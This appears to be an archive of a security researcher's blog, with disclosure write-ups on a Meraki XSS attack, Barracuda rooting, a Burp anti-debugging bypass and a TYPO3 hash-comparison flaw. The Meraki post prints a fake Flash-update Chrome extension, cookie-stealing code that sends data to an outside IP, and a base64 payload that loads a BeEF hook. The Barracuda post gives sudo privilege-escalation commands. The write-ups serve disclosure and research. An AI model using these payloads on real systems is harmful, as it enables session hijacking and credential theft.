
August 22 2013

05:47

Five Golden Rules For A Successful Bug Bounty Program

Bug bounty programs have become a popular complement to already existing security practices, like secure software development and security testing. In this space, there are successful examples with many bugs reported and copious rewards paid out. For vendors, users and researchers, this seems to be a mutually beneficial ecosystem.

The truth is that not all bug bounty initiatives have been so successful. In some cases, a great idea was poorly executed, resulting in frustration and headaches for both vendors and researchers. Ineffective programs are mainly caused by security immaturity, as not all companies are ready and motivated enough to organize and maintain such initiatives. Bug bounties are a great complement to other practices, but they cannot completely substitute professional penetration tests and source code analysis. Many organizations fail to understand that and jump on the bounty bandwagon without having mature security practices in place.

Talking with a bunch of friends during BlackHat/Defcon, we came up with a list of five golden rules to set your bug bounty program up for success. Although the list is not exhaustive, it was built by collecting opinions from numerous peers and should be a good representation of what security researchers expect.

If you are a vendor considering starting a similar initiative, please read it carefully.

The Five Golden Rules:

1. Build trust, with facts
Security testing is based on trust between client and provider. Trust is important during testing, and especially crucial at disclosure time. As a vendor, make sure to provide as much clarity as you can. For duplicate bugs, increase your transparency by providing more details to the reporter (e.g. date/time of the initial disclosure, original bug ID, etc.). Also, fixing bugs while claiming that they are not relevant (and thus not eligible for rewards) is a perfect way to lose trust.

2. Fast turnaround
Security researchers are happy to spend extra time explaining bugs and providing workarounds; however, they also expect to be notified (and rewarded) at a similarly reasonable speed. From reporting the bug to paying out rewards, you should have a fast turnaround. Fast means days - not months. Even if you need more time to fix the bug, pay out the reward immediately and explain in detail the complexity of rolling out the patch. Decoupling internal development life cycles from bounties allows you to be flexible with external reporters while maintaining your standard company processes.

3. Get security experts
If you expect web security bugs, make sure to have web security experts around you. For memory corruption vulnerabilities, you need people able to understand root causes and to investigate application crashes. Whether you build this capability internally or leverage trusted third parties, this aspect is crucial for your reputation. Many of us have experienced situations in which we had to explain basic vulnerabilities and how to replicate those issues. In several cases, the interlocutors were software engineers and not security folks: we simply speak different languages and use different tools.

4. Adequate rewards
Make sure that your monetary rewards are aligned with the market. What's adequate? Check Mozilla, Facebook, Google, Etsy and many others. If you don't have enough budget, just set up a wall of fame, send nice swag and be creative. For instance, you could decide to pay for specific classes of bugs or medium-high impact vulnerabilities only. Always paying at the low end of your rewards range, even for critical security bugs, is just pathetic. Before starting, crunch some numbers by reviewing past penetration test reports performed by recognized consulting boutiques.

5. Non-eligible bugs
Clarify the scope of the program by providing concrete examples, eligible domains and types of bugs that are commonly rejected. Even so, you will have to reject submissions for a multitude of reasons: be as clear and transparent as possible. Spend a few minutes to explain the reason for rejection, especially when the researcher has over-estimated the severity or not properly evaluated the issue.

Happy Bug Hunting, Happy Bug Squashing!

March 11 2013

07:28

Subverting a cloud-based infrastructure with XSS and BeEF

Well, the world is changing. You can probably do a lot more direct damage with a XSS in a high-value site than with a local privilege escalation in sudo [...] - lcamtuf@coredump.cx
If you are intrigued by sophisticated exploits and advanced techniques, Cross-Site Scripting probably isn't the most appealing topic for you. Nevertheless, recent events have demonstrated how this class of vulnerabilities has been used to compromise applications and even entire servers.

Today, we are going to present a possible attack scenario based on a real-life vulnerability that has recently been patched by the Meraki team. Although the vulnerability itself isn't particularly interesting, it shows how a trivial XSS flaw can be abused to subvert an entire network infrastructure.

Meraki

Meraki is the first cloud-managed network infrastructure company and it's now part of Cisco Systems. The idea is pretty neat: all network devices and security appliances (wired and wireless) can be managed by a cutting-edge web interface hosted in the cloud, allowing Meraki networks to be completely set up and controlled through the Internet. Many enterprises, universities and numerous other businesses are already using this technology.

As usual, new technologies introduce opportunities and risks. In such environments, even a simple Cross-Site Scripting or a Cross-Site Request Forgery vulnerability can affect the overall security of the managed networks.

The vulnerability

During a product evaluation of a cloud-managed Wireless Access Point, we noticed that it was possible to personalize the portal splash page. Users accessing your WiFi network can be redirected to a custom webpage (e.g. containing a disclaimer) before accessing the Internet.

To further customize our splash page, we started including images and other HTML tags. To our surprise, we quickly discovered that only basic HTML/JS validation was performed in that context. As a result, we were able to include things like:
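
An illustrative example of what slipped through (the original screenshot is not reproduced here, and the script URL below is a placeholder):

  <script>alert(document.cookie)</script>
  <script src="https://attacker.example/hook.js"></script>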


What was even more interesting is the fact that the splash page is also hosted in the cloud. Unlike traditional WiFi APs where the page is hosted on the device itself, Meraki appliances use cloud resources.

https://n20.meraki.com/splash/?mac=XXXX&client_ip=XXXX&client_mac=XXXX&vap=0&a=XXXX&b=XXXX&auth_version=5&key=ef1115d... AUTH_KEY...d41c283&node_ip=XXXX&acl_ver=XXXX&continue_url=http%3A%2F%2Fwww.google.com

To protect that page from random visitors, a unique token is used for authentication. Assuming you provide the right token and other required parameters, that page is accessible to Internet users.

Now, let's add to the mix that Meraki uses a limited number of domains for all customers (e.g. n1-29.meraki.com, etc.) and, more importantly, that the dashboard session token is scoped to *.meraki.com. This turns a stored XSS affecting our own device's domain into a vulnerability that can be abused to retrieve the dashboard cookie of other users and networks.

Attack scenario

An attacker with access to a Meraki dashboard can craft a malicious JS payload to steal the dashboard session cookie and obtain access to other users' devices. In practice, this allows an attacker to completely take over Meraki's wired and wireless networks.

BeEF, the well-known Browser Exploitation Framework, has been used to simulate a realistic attack:

  1. The attacker customizes the splash page of his/her WiFi AP with an arbitrary JS payload, which includes the BeEF hook 
  2. By connecting a device (e.g. a testing device) to the physical wireless network controlled by the attacker, it is possible to retrieve the URL of the splash page, including the unique token 
  3. Using social engineering, the attacker tricks the victim(s) into visiting the attacker-controlled splash page
  4. At this point, the victim browser is hooked in BeEF
  5. Using one of the available BeEF modules, the attacker can retrieve the HttpOnly dash_auth cookie and get access to the victim's Meraki dashboard 
  6. In the case of Meraki WiFi Access Points, a convenient map will display the position of the device. In the config tab, it is also possible to disclose the network's password. At this stage, the actual network can be fully controlled by the attacker

  

A demonstration video of the attack is also available:



For the interested readers, a few technical details are also shared:
  • Cookie flags (e.g. HttpOnly) are the ASLR/DEP of browser security. It is possible to bypass those mitigation techniques, although it's getting more complex. Thanks to the progress of browser security and general awareness, stealing cookies marked as HttpOnly via a JS payload isn't trivial anymore. Cross Site Tracing and similar techniques are obsolete. Browser plugins have also been patched. Besides exploiting specific server or browser bugs, attackers can only rely on social engineering tricks. During our Proof-of-Concept, a fake Flash update was used to install a malicious Chrome extension and get access to all cookies
  • Chrome extensions run with different privileges than normal JavaScript code executed by the renderer. A Chrome extension can override default SOP restrictions and issue cross-domain requests, read the HTTP responses, access other browser tabs, and also read every cookie, including those marked as HttpOnly. The manifest of the deliberately backdoored Chrome extension is the following; the background.js file loads the BeEF hook (a minimal sketch of it follows the manifest).

    {
      "name": "Adobe Flash Player Security Update",
      "manifest_version": 2,
      "version": "11.5.502.149",
      "description": "Updates Adobe Flash Player with latest securty updates",
      "background": {
        "scripts": ["background.js"]
      },
      "content_security_policy": "script-src 'self' 'unsafe-eval' https://174.136.111.122; object-src 'self'",
      "icons": { 
        "16": "icon16.png",
        "48": "icon48.png",
        "128": "icon128.png" 
      },
      "permissions": [
    "tabs", 
    "http://*/*", 
    "https://*/*",
      "cookies"
      ]
    }
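
    For illustration only, a background.js along these lines would fit the manifest above; the exact code used in the PoC is not shown in the post, and the exfiltration endpoint (/log) is an assumption:

      // background.js - illustrative sketch, not the original PoC code
      // Load the BeEF hook inside the extension's background page;
      // the manifest CSP above explicitly whitelists the attacker-controlled host.
      var s = document.createElement('script');
      s.src = 'https://174.136.111.122/hook.js';
      document.getElementsByTagName('head')[0].appendChild(s);

      // With the "cookies" permission and http(s)://*/* host permissions, the
      // extension can read every cookie, including those flagged as HttpOnly.
      chrome.cookies.getAll({domain: 'meraki.com'}, function(cookies) {
        cookies.forEach(function(c) {
          // Exfiltrate each cookie to the attacker host (hypothetical endpoint).
          new Image().src = 'https://174.136.111.122/log?c=' +
            encodeURIComponent(c.domain + '|' + c.name + '|' + c.value);
        });
      });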

    Not to blame Google, but just FYI: when the backdoored Chrome extension was uploaded to the Google Chrome Web Store, it was available straight after the upload. No checks were performed, for example to prevent the upload of an extension with very relaxed permissions, an unsafe-eval CSP directive, and Name/Description fields containing obviously fake content such as "Adobe Flash Update" 
  • Choosing Google Chrome as the target browser required bypassing the XSS Auditor, the integrated anti-XSS filter. As discovered by Mario Heiderich, the data URI scheme with base64 content can be leveraged to bypass the filter. The following code snippet will trigger the classic alert(1), even on the latest Google Chrome at the time of writing (version 24.0.1312.71):
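
    (Reconstructed for readability; the base64 payload simply decodes to <script>alert(1)</script>.)

    <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>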


  • The final attack vector to inject the initial BeEF hook in Meraki's page is:

    <iframe src="data:text/html;base64,PHNjcmlwdD5zPWRvY3VtZW50LmNyZ
    WF0ZUVsZW1lbnQoJ3NjcmlwdCcpO3MudHlwZT0ndGV4dC9qYXZhc2Nya
    XB0JztzLnNyYz0naHR0cHM6Ly8xNzQuMTM2LjExMS4xMjIvaG9vay5qc
    yc7ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ2hlYWQnKVswX
    S5hcHBlbmRDaGlsZChzKTs8L3NjcmlwdD4=">


    And what is actually executed is:

    <script> s=document.createElement('script'); s.type='text/javascript'; s.src='https://174.136.111.122/hook.js'; document.getElementsByTagName('head')[0].appendChild(s); </script>

    Having a backdoored Chrome extension running in your browser opens up many new attack vectors which we didn't cover in the PoC. For example, it is possible to inject the BeEF hook in every open tab (you can imagine the impact of this :-), as sketched below, or to use the victim's browser as an open proxy through BeEF's Tunneling Proxy component, and many other attacks
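
    As a further illustrative sketch (same assumptions and hook URL as above), injecting the hook into every open tab from the backdoored extension could look like:

      // Inject the BeEF hook into every tab the extension has host permissions for.
      chrome.tabs.query({}, function(tabs) {
        tabs.forEach(function(tab) {
          chrome.tabs.executeScript(tab.id, {
            code: "var s=document.createElement('script');" +
                  "s.src='https://174.136.111.122/hook.js';" +
                  "document.getElementsByTagName('head')[0].appendChild(s);"
          });
        });
      });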

This blog post is brought to you by @_ikki (NibbleSec) and @antisnatchor (BeEF core dev team).
Thanks to Meraki for the prompt response and the great service.

February 04 2013

06:56

Effective AMF Remoting Message fuzzing with Blazer v0.3


After several weeks of extensive testing and debugging, Blazer v0.3 is finally out!
It's been a long ride since the first lines of code, back in 2011. In this post, I am going to present all new features and describe Tips&Tricks to make your AMF security testing even more effective.

If you are not familiar with Blazer, have a look at the project page: http://code.google.com/p/blazer/.
New to Burp Suite? Have a look at the video tutorials and consider buying Instant Burp Suite Starter.

What's new?

Blazer v0.3 includes a few interesting new features presented during my DeepSec talk but, even more importantly, it is the result of extensive testing on Windows, Mac OS X and Linux using multiple Java Runtime Environments and recent Burp Suite releases.

  • Java classes and source code import feature
    In addition to JARs, it is now possible to import directories containing .class and .java files. The ability to import source code, in addition to application libraries, makes it possible to partially use Blazer even during black-box security testing.
  • AMF request/response export functionality (AMF2XML)
    Sharing details of security vulnerabilities triggered by AMF messages used to be annoying, as it was not possible to export AMF requests and responses in an intelligible format. Using the AMF2XML feature, it is now possible to export those messages to a file or to the console.


  • Sandbox feature using a custom security manager 
    The rationale behind the introduction of this feature is to prevent any malicious action caused by application libraries. Blazer uses Java reflection and fairly complex heuristics to automatically instantiate and populate objects by using the application libraries. Application objects are created on the tester's computer and methods are locally invoked to populate attributes before sending the AMF message to the remote service. As a result, untrusted application libraries may end up writing files, opening network sockets or other involuntary IO operations.


  • Numerous bugs and performance issues fixed
    I've fixed more than 20 bugs and multiple performance issues, including an annoying GUI refresh bug on OS X and Windows. This version has been extensively tested on multiple platforms; I've specifically delayed the release to make sure that all issues I've encountered during my testing have been fixed.


BlackBox vs GrayBox testing with Blazer

Blazer is a security tool for gray-box testing. It has been designed and built with the assumption that the application libraries are available to the tester. All Java classes exchanged between client and server should be imported in the tool. This is a realistic assumption if you are doing vulnerability research, not if you are performing a standard pentest.

However, starting from this release, it is actually possible to partially use Blazer during black-box testing. If your application uses primitive types and libraries which can be downloaded from the Internet, you can benefit from Blazer's automatic object generation by manually crafting a fake .java file including all method signatures:

1. Decompile the client-side Flex components (e.g. SWF files) or monitor the network traffic in order to enumerate all remote methods. The Deblaze tool can be used for this. 

2. Create a .java file containing the method signatures as observed in the traffic. Something like the following:

package flex.samples.product;
public class ProductService {
    // Stub body; only the signature matters for Blazer's object generation.
    public Product getProduct(int prodId) { return null; }
}

3. In Blazer, import the crafted Java source file and all application libraries referenced in the application. At this stage, Blazer can be used to automatically generate objects and perform fuzzing.

Tips & Tricks 

Fuzzing complex applications containing multiple custom classes isn't trivial. To improve coverage and effectiveness, the following recommendations can save you precious time:

  • Always increase the amount of memory that your computer makes available to Burp Suite. If you are generating a large number of AMF messages, consider chaining two instances of Burp Suite. The first instance can be used to intercept the application requests and launch Blazer. In Blazer, set the proxy within tab 3 to point to the second Burp Suite instance. The latter will collect all requests generated by Blazer. In Burp Suite Pro, you can also set automatic backups to prevent any data loss.

  • As of Burp Suite v1.5.01, Burp Extender has a new API. Blazer has been improved to support both the old and new Burp Extender APIs. Standard output and error can be displayed within Burp Extender, redirected to a file or shown in the console. During testing, I suggest redirecting those streams to two separate files in order to record all operations and exceptions.

  • Balancing the number of permutations, attack vectors and probability is the magic sauce of Blazer. Read the original whitepaper/presentation, make sure to understand those settings and tune the tool. Even better, check the implementation of the ObjectGenerator class.

  • Divide et impera by breaking up numerous application method signatures into small groups. Start testing a few methods and make sure that you have imported all required application libraries. Finally, review the server responses and monitor the server's status to detect security vulnerabilities. For example - if you are looking for SQL injections - use Burp's filter by search term to identify AMF messages that triggered visible errors and grep for similar strings in the server logs. Blazer appends a custom HTTP header to all AMF requests that can be used to correlate message and method signature. Also, the newest export functionality can be used to review the AMF payload. 

  • Feel free to email me if you have any questions. Also, let me know if you find bugs using Blazer!

    January 25 2013

    10:13

    How to patch your Barracuda virtual appliance

    It's today's "news" about backdoors found in multiple Barracuda gears. Basically, Barracuda appliances have multiple hardcoded system accounts and firewall rules specifically designed to allow remote assistance. If you want more gossip, you can read about it on KrebsOnSecurity, The Register or The H Online.

    A new old story

    According to the original advisory, the bug was discovered on 2012-11-20 by Stefan Viehböck. Although Stefan has done pretty interesting research in the past (e.g. the WiFi WPS design bug), the Barracuda backdoor is really not a new story. Not only was this issue known, it was even disclosed and discussed several times.
    Although it's natural to be surprised that such a critical issue has been underestimated for nine years, we should rather use this opportunity to stop these bad practices. Unfortunately, it's not just Barracuda - many vendors have adopted similar poorly-designed solutions for remote assistance. As customers, we should always evaluate products, and demand more accountability and transparency.

    Digital self-defense

    In 2011, while helping a friend set up his network, I came across the advisory from 2004 and started investigating. After having confirmed the issue, I decided to patch the virtual appliance on my own. If you think that the mitigation provided by Barracuda in security definition 2.0.5 is not adequate for your environment, keep reading. Hopefully, Barracuda will reconsider the situation and you won't need to manually patch your device.

    Disclaimer: Use this information at your own risk! 
    You may end up with a broken appliance and no more vendor warranty. Also, I am not a lawyer and I haven't reviewed the product EULA. Finally, note that this method has been tested against the Barracuda WebApp Firewall 660vxl (v7.5.0.x) virtual appliance only. 

    Patching your virtual appliance

    Removing system accounts and changing the iptables configuration require privileged shell access. As the original techniques for rooting the device are now deprecated (at least on the device I had), I started looking for other ways to get a root shell. Soon, I realized that it's possible to abuse the recovery partition in order to include arbitrary resources. This technique requires "physical" access to the appliance and multiple reboots, thus I consider it better than disclosing the root password, and I suggest using it in order to patch the device.

    Rooting the Barracuda WebApp Firewall requires a multi-step process:

    1) Boot the Barracuda virtual appliance with a standard Linux distribution (e.g. booting from the virtual CD) and mount the recovery partition (/dev/sda9) in order to copy the patcher script (rootme.sh).

    rootme.sh can be downloaded here
      
      $ mkdir /mnt/temp 
      $ mount /dev/sda9 /mnt/temp
      $ cp rootme.sh /mnt/temp/
      $ chmod 777 /mnt/temp/rootme.sh
      $ /mnt/temp/rootme.sh



      $ umount /mnt/temp
      $ reboot


    2) From the web console, revert the firmware to the factory-installed version (Advanced-->Firmware Update-->Firmware Revert) and reboot the appliance again. If the factory Firmware Revert button is not available (it's gray and cannot be selected), you need to update the device to the newest firmware and repeat the entire process.

    3) Visit https://barracuda_ip/cgi-mod/rootme.cgi. After that, you can connect via SSH to the device using a temporary root password. Removing the hardcoded system accounts and changing iptables is left as an exercise.


    A few more technical details:

    • rootme.sh is simply used to copy rootme.cgi to the web console webroot in order to facilitate the rooting process
    • rootme.cgi is used to escalate privileges from the Apache user (nobody) to root, change the root password and the firewall rules in order to allow external access 
    • Privilege escalation is possible due to an insecure sudoers configuration. Again, nothing fancy. Please note that I reported this misconfiguration to Barracuda on 09/12/2011.
       $ sudo mv /bin/ping /tmp/ping.old
       $ sudo ln -s /bin/bash /bin/ping
       $ sudo ping -c whoami


      January 14 2013

      06:15

      Anti-debugging techniques and Burp Suite

      Incipit

      No matter how good a Java obfuscator is, the bytecode can still be analyzed and partially decompiled. Also, using a debugger, it is possible to dynamically observe the application's behavior at runtime, making reverse engineering much easier. For this reason, developers often use routines to programmatically detect execution under a debugger in order to prevent easy access to the application's internals. Unfortunately, these techniques can also be extremely annoying for people with good intents.

       

      Burp Suite

      Over the years, starting from the very first release, I have been an enthusiastic supporter of Burp Suite. Not only was @PortSwigger able to create an amazing tool, but he also built a strong community that welcomes each release as a big event. He has also been friendly and open to feedback from us, ready to implement suggested features. Hopefully, he won't change his attitude now.

      For a few releases now, neither Burp Suite Free nor Pro can be executed under a debugger. Unfortunately, this is a severe limitation - especially considering the latest Extensibility API. The new extensibility framework is a game-changer: it is now possible to fully integrate custom extensions into our favorite tool. But how do you properly debug extensions in an IDE? Troubleshooting fairly complex extensions (e.g. Blazer) requires a lot of debugging. Setting breakpoints, stepping in and out of methods, ... are must-have operations.

      Inspired by necessity, I spent a few hours reviewing the anti-debugging mechanism used in Burp Suite Free. According to Burp's EULA (Free Edition), reversing does not seem to be illegal as long as it is "essential for the purpose of achieving inter-operability". Not to facilitate any illegal activity, this post discusses details related to the Free edition only.  
      Disclaimer: Don't be a fool, be cool. If you use Burp Pro, you must have a valid license.

       

      Automatic detection of a debugger

      In Java, it is possible to enable remote debugging with the following options:

      -Xdebug -agentlib:jdwp=transport=dt_socket,server=y,address=8000,suspend=n 

      and attach a debugger with:

       jdb -attach [host]:8000

      A common technique to programmatically understand if a program is running under a debugger involves checking the input arguments passed to the Java Virtual Machine. The following is the pseudo-code of a very common technique:
       for (String arg : ManagementFactory.getRuntimeMXBean().getInputArguments()) {
           if (arg.contains("-Xdebug") || arg.contains("-agentlib")) {
               // Do something annoying for the user
           }
       }
      In practice, ManagementFactory returns the managed bean for the runtime system of the current Java Virtual Machine, which can be used to retrieve the execution arguments (see the RuntimeMXBean API for further details). In the case of Burp Free, the application gets shut down via a System.exit(0);

       

      Bypass techniques, an incomplete list

      First of all, it is always possible to attach the debugger once the Java process is already up and running. Any check performed during the application startup won't block the execution:   

      jdb -connect sun.jvm.hotspot.jdi.SAPIDAttachingConnector:pid=[Process ID]

      Unfortunately, this is a read-only mechanism and cannot be used within traditional IDEs. A few better solutions require tweaking the application in order to modify the program execution. This can be achieved via static changes in the .class files or using static/dynamic bytecode instrumentation. The code above is pretty simple and can be bypassed in several ways:
      • Using ClassEditor, reJ or any other tool that allows .class manipulation, it is just necessary to identify all strings in the constant pool used during the string comparison within the if-statement. For instance, you could replace all strings with a bunch of "a"s so that the program won't even enter the if-statement body
      Manually changing the Constant Pool of a .class file


      • An even more portable solution, especially when string obfuscation is used, consists of editing the bytecode using Javassist or similar libraries. This allows you to write a piece of code that searches for a class and patches it:
        • For instance, we could force the getInputArguments() to return an empty List;
        • Or, we could insert an arbitrary unconditional jump jsr to skip the program shutdown;
        • Or again, it is possible to override the System.exit() method with a local method using an empty body. First, we need to create a fake static exit(int) method. Then, we replace System.exit() with the custom method within our class.
      Using JavaAssist to replace an existent method within a Class

      Patching Burp Free for debugging your custom extensions

      With the honest intent to simplify the life of coders writing custom Burp's extensions, I have developed a small utility (BurpPatchMe) to patch your own copy of Burp Free - which will allow you to debug your code in NetBeans, Eclipse, etc.
      BurpPatchMe
        A few important details:
        • BurpPatchMe works for Burp Suite Free only. I have included a specific check for it, and I have used a technique compatible with that release only. Again, you won't be able to remove the anti-debugging protection in Burp Suite Pro using this tool. Go and buy your own copy of this amazing tool!
        • BurpPatchMe is compiled without debugging info and it has been obfuscated too. A quick skiddie prevention mechanism to avoid abuses
        • BurpPatchMe does not contain any of Burp's code, libraries or resources. It is your own responsibility to accept the EULA agreement and its conditions before downloading Burp Free. Also, this tool is provided as is - please do not send emails/comments asking for "features"
        • Java JDK is required in order to use this tool. All other dependencies are included within the jar
      You can download BurpPatchMe here and launch it with:
      $ java -jar BurpPatchMe.jar -file burpsuite_free_v1.5.jar   
       Long live Burp Suite and happy extensions!

      October 21 2011

      06:24

      "No More Free Bugs" Initiatives

      Two years after the launch of the "No More Free Bugs" philosophy, several companies and Open Source projects are now offering programs designed to encourage security research in their products. In addition, many private firms are publicly offering vulnerability acquisition programs.


      This post is an attempt to catalog all public and active incentives. This includes traditional "Bug Bounty Programs" as well as "Vulnerability/Exploit Acquisition Programs".

      Bug Bounty Programs


      • Barracuda: Vulnerabilities in Barracuda appliances, including Spam/Virus Firewall, Web Filter, WAF, NG Firewall. Reward: $500-$3,133.7
      • CCBill.com: CCBill web application vulnerabilities. Reward: $200-$500
      • Djbdns: Verifiable security holes in the latest version of Djbdns. Reward: $1000
      • Facebook: Facebook web platform security bugs. No third-party applications. Reward: starting from $500
      • Google: Chromium browser project and selected Google web properties bugs. Reward: $500-$3,133.7
      • Hex-Rays: Security bugs in the latest public release of Hex-Rays IDA. Reward: up to $3000
      • Mozilla: Firefox, Thunderbird and selected Mozilla Internet-facing websites bugs. Reward: $500-$3000, plus a Mozilla T-shirt
      • Piwik: Flaws in Piwik web analytics software. Reward: $200-$500
      • Qmail: Verifiable security holes in the latest version of Qmail. Reward: $5000
      • Tarsnap: Tarsnap bugs, affecting either pre-release or released versions. Reward: $1-$2000
      Vulnerability/Exploit Acquisition Programs


      • BeyondSecurity SecuriTeam: High and medium impact bugs in widely spread software. Reward: n/a
      • Coseinc: Unpublished security vulnerabilities for Windows, Linux and Solaris. Reward: n/a
      • Digital Armaments: Vulnerability and/or exploit code for high value software. Reward: n/a
      • ExploitHub: Legitimate market-place for non-zero-day Metasploit exploits. Reward: $50~$1000
      • iSight Partners: Bugs in typical corporate environment applications. Reward: n/a
      • Netragard: 0-day exploits against well-known software. Reward: n/a
      • TippingPoint ZDI: Undisclosed vulnerability research, affecting widely deployed software. Reward: n/a, plus awards and benefits depending on the contributor's status
      • VeriSign iDefence: Security vulnerabilities in widely deployed applications. Reward: n/a
      • White Fir Design: Bugs in WordPress code and plugins (with over 1 million downloads and compatible with the most recent WordPress). Reward: $50-$500
      Contributions are welcome! If you are aware of an initiative not listed here, please leave a comment and we will update this page over time.

      Just to clarify, we aim at indexing programs that are:
      • Legal. Although black/gray marketplaces exist, we certainly don't want to list them here
      • Active. We want to keep track of ongoing initiatives. Even time-limited programs are eligible, as long as they are still accepting submissions
      • Public. All entries must have publicly available details. This may range from accurate guidelines and rules to just a simple sentence stating the nature of the incentive
      • Reward-based. In most cases, entries are "cash-for-bugs" programs. However, any kind of tangible reward is eligible. "No More Free Bugs" versus "No More Cheap Bugs" disputes are not considered here

      June 21 2011

      22:04

      MS Access SQL Injection Cheat Sheet Reloaded

      SQL Injections are still very popular, for both ethical and unethical attackers.
      Although numerous research papers covering this topic have been published, SQL Injection vulnerabilities in Microsoft Access-powered websites haven't received much attention.

      Back in 2007, @_daath published the first MS Access SQL Injection Cheat Sheet. A few years later, NibbleSec decided to update the document in a brand new format. New material has been added and external resources have been merged.

      Enjoy the reloaded MS Access SQL Injection Cheat Sheet

      December 30 2010

      18:19

      TYPO3-SA-2010-020, TYPO3-SA-2010-022 explained

      On 16th December, TYPO3 released a new security update (TYPO3-SA-2010-022) for their content management system. Apparently, this web-based framework is widely used in many important websites.
      Within this update, the TYPO3 team fixed a vulnerability that I discovered a few weeks ago. In detail, this discovery pertains to a previous vulnerability fixed in TYPO3-SA-2010-020 and discovered by Gregor Kopf.

      TYPO3 decided to follow a policy of least disclosure. Although it's an Open Source project, no technical details are available in the wild besides these (1,2). As I strongly believe that this practice does not improve overall security (as mentioned in a previous post), I've decided to briefly explain this interesting flaw.

      From the advisory, we can actually deduce two important concepts:
      A Remote File Disclosure vulnerability in the jumpUrl mechanism [..] Because of a non-typesafe comparison between the submitted and the calculated hash, it is possible [..]
      In a nutshell, the JumpUrl mechanism allows tracking access to web pages and provided files (e.g. /index.php?id=2&type=0&jumpurl=/etc/passwd&juSecure=1&locationData=2%3a&juHash=2b1928bfab)

      The patch (see this shell script) simply replaces the two equal signs with three (loose vs strict comparisons).

      That's the affected code: in essence, a loose comparison of the form if ($juHash == $calcJuHash).


      Having this knowledge, it is probably clear to the reader that the overall goal is to bypass the comparison between $juHash and $calcJuHash. While the former is user supplied (string or array), the latter is derived from a substr(md5_value,10) (string).

      In PHP, comparisons involving numerical strings result in unexpected behaviors (at least for me before studying this chapter).
      If you compare a number with a string or the comparison involves numerical strings, then each string is converted to a number and the comparison performed numerically
      If the string does not contain any of the characters '.', 'e', or 'E' and the numeric value fits into integer type limits (as defined by PHP_INT_MAX), the string will be evaluated as an integer. In all other cases it will be evaluated as a float.
      For instance, the following comparisons are always TRUE:
      if(0=="php")-> TRUE
      if(12=="12php")-> TRUE
      if(110=="110")-> TRUE
      if(100=="10E1")-> TRUE
      if(array()==NULL) -> TRUE
      [..]
      And again, also the following comparisons are TRUE:
      If("0"=="0E19280311"){}
      If("0"=="0E00106552"){}
      If("0"=="0E81046233"){}
      Consequently, we can pad the request and wait until the substring of an MD5 hash takes this form. If you do the math, you will discover that the number of attempts required is considerably lower than pure bruteforcing:
      ~37037037 trials at most (worst case) VS 3656158440062976 total possibilities
      In practice, the number of iterations is even lower, as "0000E13131" and similar strings are also accepted.

      To further improve this attack, I've discovered another bypass (TYPO3-SA-2010-022) which allows the disclosure of TYPO3_CONF_VARS['SYS']['encryptionKey']. In this way, it is possible to retrieve the key once and download multiple files without repeating the entire process. Using multiple requests, this attack takes a few minutes (8-20 minutes in a local network). A real coder can surely enhance it.

      As you can see from the exploit (posted on The Exploit Database), the fileDenyPattern mechanism bypass is pretty trivial. A demonstration video is also available here (slow connection, sorry).

      Keep your TYPO3 installation updated! A patch is already available from the vendor's site.

      @_ikki

      December 29 2010

      12:46

      Unspecified vulnerabilities

      If you're a pentester, it's probably not news to you that "least disclosure" policies for disclosing vulnerabilities are fruitless. Unfortunately, they are even counterproductive for the entire security ecosystem, and I will try to convince you of this in this post.

      Before going any further, let's explain what "least disclosure" actually means.
      In a nutshell, least disclosure is about providing the least necessary facts of vulnerabilities that are needed to know if a user might be affected and what the possible impact would be. No technical details, no exploits, no proof-of-concept code.

      As mentioned here, you may argue that it increases the overall security as a random "black hat needs to put some efforts in thinking and coding before he's able to exploit a vulnerability".

      However, we all claim that "security through obscurity" is bad:
      • Aggressors don't have time constraints. They can analyze patches, read all documentation and spend nights on a single flaw

      • No technical details in the wild generally means no signatures and detectors in security tools

      • "Least Disclosure" tends to degenerate in "Unspecified Vulnerability in Unspecified Components". Please fix your computer and don't ask why
      Although we cannot certainly force vendors' disclosure policies, sharing the outcome of any security research may be beneficial at the end of the day.

      Thoughtful reader, please note that getting profit from vulnerabilities does not necessarily imply concealing details. For instance, see the Mozilla Security Bounty Program FAQ.
      We're rewarding you for finding a bug, not trying to buy your silence
      If you enjoy the spirit, you may appreciate the following posts. Welcome back NibbleSec readers!

      @_ikki

      January 29 2010

      10:11

      Modern magicians

      Recently, I have been asked to write a non-tech article about pentesting and vulnerability research. As it might be interesting to some readers, I decided to share a few fragments here.

      "Any sufficiently advanced technology is indistinguishable from magic"
      Arthur C. Clarke

      Since my early days with computers, I have always cited this law of Clarke's to people astonished by technology artifacts. These days, I still use the same quote while explaining my job as a pentester to non-technical people. Beyond the shadow of a doubt, security testing is far from magic, being a complex technology-based process. It requires a proper mix of scientific know-how, creativity and expertise in cutting-edge technologies. Staying on top of the latest vulnerabilities and computer attacks requires continual study, in-depth research, as well as continual discussion and feedback with fellow security professionals.

      "0days are a device to prove that a client is unready to handle the unknown"
      Pete Herzog

      Understanding incoming threats or even discovering new vulnerabilities gives a crucial advantage over potential aggressors. It allows system owners to protect their installations in spite of the public spread of critical flaws. In the long term, it also provides important insights which are useful for designing more secure technologies in the future. As 0days are the product of intensive research work, vulnerability research activities are essential for pentesting.

      "I’ve always said that hacking is not about skill set. It is mostly about dedication, patience and a lot of motivation"
      Pdp, GNUCITIZEN

      Hacking is about skills, dedication, patience, passion and creativity. Properly mixing these elements makes it possible to experiment with computers (and not only computers!). During a pentest, trying to understand how systems work and using them in an unconventional way is the key to circumventing protections and exploiting vulnerabilities. After all, security testing is just about mastering technology and doing magic tricks.
      Tags: ikki hacking

      July 22 2009

      12:26

      XSS flaws are boring!

      Cross-Site Scripting flaws are quite unexciting from the technical point of view. Don't you think?

      Most of the time, it is not challenging to look for XSS vulnerabilities since a lot of applications do not provide any input validation at all against this specific attack. In addition, the application entry points are so copious that it is like shooting in a crowded square (well, never tried).

      However, they still exist and we still have to report them.
      We will probably all agree about the dangerous effects of such client-side attacks. We have seen several real-life threats (e.g. the CriticalPath vulnerability, the Twitter worm attack, StrongWebmail), and we know efficient (sufficient?) protection mechanisms (e.g. NoScript, OWASP ESAPI, Secure Coding).

      Having said that, I would like to point out a couple of trivial security flaws I have discovered over the last few months: (A) Sun Java Web Console Multiple Cross Site Scripting and yet another (B) Oracle Application Server 10g (v9.x) Cross Site Scripting.

      (A) Just because I believe in full disclosure, let's specify the unspecified input (as reported by the vendor). Due to the lack of input filtering within the "HELP" resources, it is possible to inject JS code and trigger XSS attacks. During my audit, several attack vectors were found:

